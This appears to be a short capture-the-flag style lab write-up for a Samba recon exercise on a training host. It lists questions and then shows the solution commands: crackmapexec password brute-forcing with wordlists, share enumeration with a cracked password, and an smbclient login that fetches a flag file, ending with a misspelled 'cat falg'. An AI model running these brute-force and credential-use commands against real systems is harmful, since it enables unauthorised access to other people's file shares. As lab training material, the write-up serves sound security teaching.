Samba Recon: Dictionary Attack

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Objective: Answer the following questions:

What is the password of user “jane” required to access share “jane”? Use smb_login metasploit module with password wordlist /usr/share/wordlists/metasploit/unix_passwords.txt
What is the password of user “admin” required to access share “admin”? Use hydra with password wordlist: /usr/share/wordlists/rockyou.txt
Which share is read only? Use smbmap with credentials obtained in question 2.
Is share “jane” browseable? Use credentials obtained from the 1st question.
Fetch the flag from share “admin”
List the named pipes available over SMB on the samba server? Use pipe_auditor metasploit module with credentials obtained from question 2.
List sid of Unix users shawn, jane, nancy and admin respectively by performing RID cycling using enum4Linux with credentials obtained in question 2.

crackmapexec smb demo.ine.local -u jane -p /usr/share/wordlists/metasploit/unix_passwords.txt

crackmapexec smb demo.ine.local -u admin -p /usr/share/wordlists/metasploit/unix_passwords.txt

crackmapexec smb demo.ine.local -u admin -p password1 --shares

smbclient -U admin //demo.ine.local/admin
password1
cd hidden
get flag.tar.gz
exit
gunzip flag.tar.gz
tar -xvf flag.tar
cat falg

Last updated 5 months ago